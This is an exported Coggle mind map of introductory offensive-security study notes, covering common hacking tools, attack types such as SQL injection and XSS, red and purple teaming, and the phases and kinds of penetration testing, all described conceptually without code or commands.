Please enable JavaScript.
Coggle requires JavaScript to display documents.
Offensive Security - Coggle Diagram
Offensive Security
Offensive Tools
-
Kali Linux:
A operating system that comes pre installed with many tools used for ethical and unethical hacking.
-
Burp Suite:
A tool that scans websites for vulnerabilities. intercepts web traffic and automates attacks for exploitation
Wireshark:
A tool that analyses and captures network protocols and traffic. This helps to find security issues in network communications.
-
Aircracking:
A tool that is used to capture handshakes, crack wifi passwords/password encryptions, and can sniff packets
-
-
Offensive threats
DOS attack:
A Denial of Service attack is an attack used by hackers to take down servers through overloading. Hackers initially exploit other computers and make a hive. This hive will continuously ping a website multiple times as fast as possible. This will overload the server and lead to the system
crashing and being taken down
SQL injections:
This attack is only performed on server links to SQL databases. Running SQL code on a website or system that connects to an SQL database will make the system run the code. Allowing hackers to ask the system to retrieve and display sensitive information that normally could not be accessed.
Cross Site Scripting:
Cross site scripting (XSS) is very similar to SQL injection. Instead of targeting SQL databases, XSS targets websites that use javascript. By inserting Javascript code into the website, the website will run the code allowing the hacker to retrieve data from the website.
Social Engineering:
This method is used by hackers to retrieve information about the target in order to brute force their way into the system. Methods like phishing, baiting, pretexting or other tactics are used to trick targets into letting the hacker into their system.
Teams
Red Teaming
Form of Data security testing where a team of security experts use the Tactics and Protocols of real cybercriminals to simulate an attack against the system without reulting in any real damage. After the attack is finished, the resulting breaches and vulnerabilities are shared with the blue team to be resolved
-
Purple Teaming
Purple Teaming is a mix of Blue and Red teaming where both teams cooperate on defending and improving security measures and issues as they discovered live, allwoing for more efficient improvement of cybersecurity
Iterative in nature - after an attack is initiated by red team and the data is gathered, both teams review the performance and failures of the system, and these issues are resolved by the blue team
Pen-Testing
-
Process
In a black-box test, pen testers have no information about the target system. They must rely on their own research to develop an attack plan, as a real-world hacker would.
In a white-box test, pen testers have total transparency into the target system. The company shares details like network diagrams, source codes, credentials, and more.
In a gray-box test, pen testers get some information but not much. For example, the company might share IP ranges for network devices, but the pen testers have to probe those IP ranges for vulnerabilities on their own.
-
The testing team gathers information on the target system. Pen testers use different recon methods depending on the target. For example, if the target is an app, pen testers might study its source code. If the target is an entire network, pen testers might use a packet analyzer to inspect network traffic flows.
Pen testers often draw on open source intelligence (OSINT) as well. By reading public documentation, news articles, and even employees' social media and GitHub accounts, pen testers can glean valuable information about their targets.
-
Pen testers use the knowledge that they gained in the recon step to identify exploitable vulnerabilities in the system. For example, pen testers might use a port scanner like Nmap to look for open ports where they can send malware. For a social engineering pen test, the testing team might develop a fake story, or "pretext," they use in a phishing email to steal employee credentials.
As part of this step, pen testers may check how security features react to intrusions. For example, they might send suspicious traffic to the company's firewall to see what happens. Pen testers will use what they learn to avoid detection during the rest of the test.
-
The testing team begins the actual attack. Pen testers may try a variety of attacks depending on the target system, the vulnerabilities they found, and the scope of the test. Some of the most commonly tested attacks include:
SQL injections: Pen testers try to get a webpage or app to disclose sensitive data by entering malicious code into input fields.
-
Denial-of-service attacks: Pen testers try to take servers, apps, and other network resources offline by flooding them with traffic.
Social engineering: Pen testers use phishing, baiting, pretexting, or other tactics to trick employees into compromising network security.
Brute force attacks: Pen testers try to break into a system by running scripts that generate and test potential passwords until one works.
Man-in-the-middle attacks: Pen testers intercept traffic between two devices or users to steal sensitive information or plant malware.
-
Types
Application pen testing:
Application pen tests look for vulnerabilities in apps and related systems, including web applications and websites, mobile and IoT apps, cloud apps, and application programming interfaces (APIs).
Network pen testing:
Network pen tests attack the company's entire computer network. There are two broad types of network pen tests: external tests and internal tests. An external test is when pen testers mimic the behavior of external hackers to find security issues in internet-facing assets like servers, routers, websites, and employee computers. These are called “external tests” because pen testers try to break into the network from the outside. An internal test is when pen testers mimic the behavior of malicious insiders or hackers with stolen credentials. The goal is to uncover vulnerabilities a person might exploit from inside the network; for example, abusing access privileges to steal sensitive data.
Hardware pen testing:
These security tests look for vulnerabilities in devices connected to the network, such as laptops, mobile and IoT devices, and operational technology (OT). Pen testers may look for software flaws, like an operating system exploit that allows hackers to gain remote access to an endpoint. They may look for physical vulnerabilities, like an improperly secured data center that malicious actors might slip into.
Personnel pen testing:
these security tests assess how vulnerable a company is to social engineering attacks. Personnel pen testers use phishing, vishing (voice phishing), and smishing (SMS phishing) to trick employees into giving sensitive information. Personnel pen tests may also evaluate physical office security. For example, pen testers might try to sneak into a building by disguising themselves as delivery people. This method, called "tailgating," is commonly used by real-world criminals.
-